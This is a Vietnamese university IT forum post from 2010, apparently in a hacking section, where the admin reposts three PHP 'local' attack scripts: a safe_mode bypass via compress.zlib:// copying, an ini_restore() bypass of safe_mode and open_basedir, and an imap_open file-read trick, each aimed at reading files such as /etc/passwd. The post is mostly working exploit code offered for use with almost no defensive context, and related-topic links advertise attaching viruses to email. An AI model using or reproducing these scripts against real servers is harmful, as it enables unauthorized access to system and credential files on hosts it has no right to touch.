»-(¯`v´¯)-»Diễn Đàn Trường Công Nghệ Thông Tin Thái Nguyên»-(¯`v´¯)-»
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.

»-(¯`v´¯)-»Diễn Đàn Trường Công Nghệ Thông Tin Thái Nguyên»-(¯`v´¯)-»

.:hix lâu không làm web.nên giờ lười làm quá.dùng tạm cái Forum việt vậy.chủ yếu là chất lượng Những bài viết thôi đúng không.thật THà là nói hết không giấu diếm nhưng học xong cấm nghịch bậy..http://guichonguoiay.net.tf web mình đó RỖI VÀO CHơi Ha.hjhj:.
 
Trang ChínhPortalGalleryTìm kiếmLatest imagesĐăng kýĐăng Nhập
Thông Tin Cực Sock Cho Những Ai Nghiện Game Audition Của Thái Nguyên.Sau Một Thời Gian Tìm Hiểu Mà Nhờ Mấy Anh Ở forum ClbGame Mình Đã Cài THành Công Bản Audition Offline THái Nguyên.Sắp Tới Mình Sẽ Đưa Lên Online.Các Bạn Muốn Chơi Game Và Muốn Sở Hữu Những Bộ Đồ Đẹp Nhất Không Còn Chần Chừ Gì Nữa Mà Không Click Chuột Để Truy Cập Trang Web wWw.AuTn.tk Để Download Và Thưởng thức
Tìm kiếm
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
Navigation
 Portal
 Diễn Đàn
 Thành viên
 Lý lịch
 Trợ giúp
 Tìm kiếm
Diễn Đàn
Affiliates
free forum

Diễn Đàn

 

 1 vài chiêu thức local !

Go down 
Tác giảThông điệp
Admin
Admin



Tổng số bài gửi : 136
Join date : 13/03/2010

1 vài chiêu thức local ! Empty
Bài gửiTiêu đề: 1 vài chiêu thức local !   1 vài chiêu thức local ! Icon_minitimeTue Mar 16, 2010 9:21 pm

1 vài chiêu thức local !


--------------------------------------------------------------------------------

sưu tầm từ nhiều người !

1. Cho php 4.2 và 5.12 trở xuống: thanks to Maksymilian Arciemowicz

Code:

<?php

/*

Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2

by Maksymilian Arciemowicz

*/





$file=""; // File to Include... or use _GET _POST

$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp







echo "<PRE>\n";

if(empty($file)){

if(empty($_GET['file'])){

if(empty($_POST['file'])){

die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like

?file=/etc/passwd\n <B><CENTER><FONT

COLOR=\"RED\">SecurityReason.Com

Exploit</FONT></CENTER></B>");

} else {

$file=$_POST['file'];

}

} else {

$file=$_GET['file'];

}

}



$temp=tempnam($tymczas, "cx");



if(copy("compress.zlib://".$file, $temp)){

$zrodlo = fopen($temp, "r");

$tekst = fread($zrodlo, filesize($temp));

fclose($zrodlo);

echo "<B>--- Start File ".htmlspecialchars($file)."

-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File

".htmlspecialchars($file)." ---------------\n";

unlink($temp);

die("\n<FONT COLOR=\"RED\"><B>File

".htmlspecialchars($file)." has been already loaded. SecurityReason Team

;]</B></FONT>");

} else {

die("<FONT COLOR=\"RED\"><CENTER>Sorry... File

<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have

access.</CENTER></FONT>");

}

?>



2. cho php 4.4 và 5.16 trở xuống (thanks to Maksymilian Arciemowicz) local qua php_admin* bypass by ini_restore() !!

Code:

<?

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

ini_restore("safe_mode");

ini_restore("open_basedir");

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

?>


3.

Code:

<?

$vnforce = @imap_open("/path/file", "", "");

$result = @imap_body($vnforce, 1);

echo $result; @imap_close($vnforce);

?>



black_hat_cr(HCE)
Về Đầu Trang Go down
https://itcu.forumvi.com
 
1 vài chiêu thức local !
Về Đầu Trang 
Trang 1 trong tổng số 1 trang
 Similar topics
-
» Những CMD thường dùng khi Hack local
» Cách thức gắn virus vào mail
» Các kiến thức hacking cơ bản và cổ điển !!! (bài 1)
» Các kiến thức hacking cơ bản và cổ điển (bài 2)
» Các kiến thức hacking cơ bản và cổ điển bài 3

Permissions in this forum:Bạn không có quyền trả lời bài viết
»-(¯`v´¯)-»Diễn Đàn Trường Công Nghệ Thông Tin Thái Nguyên»-(¯`v´¯)-» :: Phận Làm Trai Gõ Phím Bình Thiên Hạ--Chí Anh Hùng Click Chuột Định Giang Sơn :: Những điều cơ bản để hack một trang web-
Chuyển đến